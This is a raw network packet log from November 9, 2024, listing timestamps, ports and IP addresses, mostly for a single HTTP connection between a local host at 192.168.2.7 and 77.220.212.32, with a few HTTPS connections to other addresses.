Nov 9, 2024 02:47:35.327241898 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.327259064 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.327267885 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327280998 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.327296019 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327308893 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.327316999 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327327013 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327333927 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327337980 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327342987 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.327353954 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.327363014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327369928 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327375889 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327392101 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.327403069 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.327461958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327469110 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327480078 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327521086 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.327559948 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327565908 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327579021 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327584028 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327590942 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327594995 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327611923 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.327614069 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327639103 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.327646971 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327658892 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.327683926 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.327730894 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327737093 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327743053 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327776909 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.328329086 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.328382969 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.328406096 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.328411102 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.328418016 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.328423977 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.328480959 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.331331015 CET	443	53047	20.99.185.48	192.168.2.7
Nov 9, 2024 02:47:35.372313023 CET	53063	443	192.168.2.7	204.79.197.219
Nov 9, 2024 02:47:35.372328997 CET	443	53063	204.79.197.219	192.168.2.7
Nov 9, 2024 02:47:35.372425079 CET	53063	443	192.168.2.7	204.79.197.219
Nov 9, 2024 02:47:35.372868061 CET	53063	443	192.168.2.7	204.79.197.219
Nov 9, 2024 02:47:35.372873068 CET	443	53063	204.79.197.219	192.168.2.7
Nov 9, 2024 02:47:35.373241901 CET	53064	443	192.168.2.7	204.79.197.219
Nov 9, 2024 02:47:35.373286963 CET	443	53064	204.79.197.219	192.168.2.7
Nov 9, 2024 02:47:35.373344898 CET	53064	443	192.168.2.7	204.79.197.219
Nov 9, 2024 02:47:35.373542070 CET	53064	443	192.168.2.7	204.79.197.219
Nov 9, 2024 02:47:35.373549938 CET	443	53064	204.79.197.219	192.168.2.7
Nov 9, 2024 02:47:35.386975050 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.391768932 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.430883884 CET	443	53048	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.430903912 CET	443	53048	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.430964947 CET	53048	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.430969954 CET	443	53048	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.431027889 CET	53048	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.437871933 CET	53048	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.437897921 CET	443	53048	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.499389887 CET	443	53047	20.99.185.48	192.168.2.7
Nov 9, 2024 02:47:35.499407053 CET	443	53047	20.99.185.48	192.168.2.7
Nov 9, 2024 02:47:35.499469042 CET	53047	443	192.168.2.7	20.99.185.48
Nov 9, 2024 02:47:35.499488115 CET	443	53047	20.99.185.48	192.168.2.7
Nov 9, 2024 02:47:35.500232935 CET	53047	443	192.168.2.7	20.99.185.48
Nov 9, 2024 02:47:35.500286102 CET	443	53047	20.99.185.48	192.168.2.7
Nov 9, 2024 02:47:35.500411987 CET	53047	443	192.168.2.7	20.99.185.48
Nov 9, 2024 02:47:35.625868082 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.625941038 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.625946999 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.625978947 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.626000881 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.626061916 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.626069069 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.626075029 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.626117945 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.626148939 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.628479958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.628516912 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.628521919 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.628535032 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.628540039 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.628546000 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.628561020 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.628585100 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.630314112 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.630372047 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.630376101 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.630378962 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.630386114 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.630390882 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.630407095 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.630419016 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.630455017 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.631407976 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.631443024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.631457090 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.631464005 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.631469965 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.631470919 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.631484985 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.631490946 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.631510019 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.631525993 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.632152081 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632199049 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632204056 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632217884 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632222891 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.632225037 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632253885 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.632318974 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.632333040 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632339954 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632353067 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632358074 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632364035 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632385969 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632391930 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632392883 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.632405043 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.632405043 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632416010 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632421970 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632437944 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.632467031 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.632524014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632538080 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632544994 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632550001 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632560968 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632569075 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632575035 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632575035 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.632601976 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632608891 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632625103 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632626057 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.632642984 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632664919 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.632687092 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632704973 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632709980 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632714033 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632719994 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632723093 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.632726908 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632735014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632740021 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632741928 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.632770061 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.632783890 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.632808924 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632813931 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632836103 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632863045 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.632883072 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.632913113 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632919073 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632936954 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632944107 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632955074 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.632961988 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.632988930 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.633008957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633013010 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633032084 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633114100 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.633114100 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.633184910 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633189917 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633203030 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633208990 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633223057 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633229017 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.633234978 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633243084 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633249998 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633251905 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.633255959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633263111 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633269072 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633280993 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633294106 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.633306980 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.633325100 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633328915 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.633332968 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633344889 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633351088 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633377075 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633378029 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.633383989 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633390903 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633403063 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633408070 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.633464098 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.633464098 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.633508921 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633516073 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633527040 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633563042 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.633593082 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633599997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633606911 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633611917 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633618116 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633641005 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.633655071 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.633707047 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633719921 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633730888 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633737087 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633749962 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633754969 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633761883 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633769989 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.633774996 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633781910 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633788109 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.633806944 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.633810997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633821964 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633829117 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633841991 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.633860111 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633866072 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.633923054 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633929014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633940935 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633946896 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633964062 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.633971930 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.633994102 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.634006023 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634006977 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.634015083 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634027958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634035110 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634052992 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.634079933 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634118080 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634124041 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.634124041 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634124041 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.634138107 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634170055 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.634217024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634223938 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634229898 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634242058 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634248018 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634259939 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634264946 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634264946 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.634270906 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634280920 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.634318113 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.634368896 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634375095 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634386063 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634391069 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634397984 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634411097 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634418011 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634423018 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634429932 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634435892 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634450912 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.634469986 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.634481907 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634488106 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634500027 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.634520054 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634526014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634531975 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634536028 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.634565115 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.634623051 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634638071 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634644032 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634687901 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.634804010 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634810925 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634818077 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.634848118 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.634871960 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.635039091 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635047913 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635054111 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635090113 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.635106087 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635113001 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635126114 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635158062 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.635181904 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.635282993 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635296106 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635302067 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635307074 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635320902 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635328054 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635334969 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.635334969 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635343075 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635348082 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635354042 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635360956 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635375023 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635389090 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635395050 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635396004 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.635396004 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.635402918 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635409117 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635411978 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.635416031 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635422945 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635428905 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635432959 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.635437012 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635445118 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635456085 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.635483027 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.635607004 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635622025 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635628939 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635663033 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.635690928 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635698080 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635704041 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635710001 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635715008 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635720015 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635725975 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635732889 CET	80	52982	77.220.212.32	192.168.2.7
